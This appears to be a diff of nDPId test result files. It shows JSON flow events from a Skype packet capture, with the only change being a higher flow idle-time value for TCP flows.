00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970707911,"flow_last_seen":1431970707911,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970707911,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"133.236.67.25","src_port":13021,"dst_port":49195,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1431970707911,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970707911,"pkt":"0NQSxnP1PBXCt3IOCABFAAAu+nsAAEAR9XPAqAEihexDGTLdwCsAGiMOfdMCo1rvIegrMqRysYXm5vlz"} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970707911,"flow_last_seen":1431970707911,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970707911,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"133.236.67.25","src_port":13021,"dst_port":49195,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2145,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970708715,"flow_last_seen":1431970708715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708715,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51319,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2145,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1431970708715,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970708715,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWHtAAEAGQ63AqAEi1KEIJMh3NFBvQ5mUAAAAALAC\/\/+uawAAAgQFtAEDAwUBAQgKPjKmLwAAAAAEAgAA"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2145,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970708715,"flow_last_seen":1431970708715,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708715,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51319,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2145,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1431970708715,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970708715,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWHtAAEAGQ63AqAEi1KEIJMh3NFBvQ5mUAAAAALAC\/\/+uawAAAgQFtAEDAwUBAQgKPjKmLwAAAAAEAgAA"} 00708{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.188.134.174","src_port":13021,"dst_port":22436,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970651380,"flow_last_seen":1431970679567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":441,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970651380,"flow_last_seen":1431970679567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":441,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970651380,"flow_last_seen":1431970679567,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":441,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970651380,"flow_last_seen":1431970679567,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":441,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634648,"flow_last_seen":1431970634648,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61016,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970659480,"flow_last_seen":1431970693361,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51250,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970659480,"flow_last_seen":1431970693361,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970668514,"flow_last_seen":1431970696319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970668514,"flow_last_seen":1431970696319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970673563,"flow_last_seen":1431970703649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51268,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970673563,"flow_last_seen":1431970703649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970684583,"flow_last_seen":1431970684880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51283,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970684583,"flow_last_seen":1431970684880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51283,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970659480,"flow_last_seen":1431970693361,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51250,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970659480,"flow_last_seen":1431970693361,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970668514,"flow_last_seen":1431970696319,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970668514,"flow_last_seen":1431970696319,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970673563,"flow_last_seen":1431970703649,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51268,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970673563,"flow_last_seen":1431970703649,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970684583,"flow_last_seen":1431970684880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51283,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970684583,"flow_last_seen":1431970684880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51283,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970707911,"flow_last_seen":1431970707911,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"133.236.67.25","src_port":13021,"dst_port":49195,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970670304,"flow_last_seen":1431970696803,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61095,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431970687262,"flow_last_seen":1431970707409,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"83.31.12.173","src_port":13021,"dst_port":23939,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -986,75 +986,75 @@ 00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634729,"flow_last_seen":1431970661287,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59113,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970687670,"flow_last_seen":1431970706351,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51289,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970687670,"flow_last_seen":1431970706351,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51289,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970635489,"flow_last_seen":1431970690062,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":2405,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51231,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1431970688781,"flow_last_seen":1431970693454,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2900,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51292,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1431970688781,"flow_last_seen":1431970693454,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2900,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51292,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970687670,"flow_last_seen":1431970706351,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51289,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970687670,"flow_last_seen":1431970706351,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51289,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970635489,"flow_last_seen":1431970690062,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":2405,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51231,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1431970688781,"flow_last_seen":1431970693454,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2900,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51292,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1431970688781,"flow_last_seen":1431970693454,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2900,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51292,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 